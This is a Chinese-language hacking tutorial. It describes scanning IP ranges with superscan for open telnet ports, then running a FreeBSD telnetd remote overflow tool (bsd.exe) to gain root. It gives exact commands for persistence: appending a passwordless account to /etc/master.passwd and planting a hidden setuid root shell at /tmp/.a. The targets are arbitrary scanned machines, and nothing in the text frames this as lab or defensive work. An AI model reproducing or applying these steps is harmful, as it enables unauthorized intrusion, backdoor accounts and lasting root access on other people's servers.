superscan:强大的端口扫描器,快速扫描目标服务器端口
bsd.exe:FreeBSD Telnetd的远程溢出程序
一、搜索主机 启动superscan,在IP栏中的开始与停止处,填入起始IP和终止IP,选择搜索23端口,点击开始。去听听音乐,回来后发现扫描完成,出现很多开放23端口的机器,找到返回值是..%的IP。如图1
因为FreeBSD远程溢出需要很高的网速,所以我登陆了我的一台开放3389的高速服务器上。打开CMD.exe,进入到有bsd.exe的文件夹,键入bsd -c IP 来对这台服务器进行测试,观察速度足够快。如图2,显示check:PASSED,using 16mb mode 测试通过!
键入bsd -f IP,对FreeBSD服务器进行远程溢出!如图
命令执行后,会显示溢出完成的百分率以及所剩时间。如果你登陆的服务器的带宽足够大,那溢出的时间就会短。如图4
当完成了100%后,键入id后按回车键,显示?uid=0(root) gid=0(wheel) 就说明我们已经溢出成功,拥有管理员权限!如图5
了保持在这台FreeBSD服务器上的权限,需要建立一个属于我们自己的帐号,这就用到了下面二行命令。echo 用户名::92:206::0:0::/:/bin/sh >> /etc/master.passwd
/usr/sbin/pwd_mkdb /etc/master.passwd
如图6,我建立了一个ID为88的hxf的帐号!
拥有一个普通帐号并不是我们想要达到的最终目的,我们希望这个建立的帐号拥有管理员权限。这就用到了下面三行命令。cp /bin/sh /tmp/.a
chmod 777 /tmp/.a
chmod +s /tmp/.a 如图7
所有的工作都已经做好了,我们现在打开开始--运行,键入telnet IP 23 按回车键。如图
在登陆界面中,我们在login中输入我们刚才建立的帐号。如图9
出现了“$”号,说明我们已经用刚才建立的普通权限的帐号登陆到这台服务器。如图10
执行刚才我们做的后门/tmp/.a 按回车键,看到了吗,漂亮的“#”号出来了,我们已经拥有管理员权限了!如图11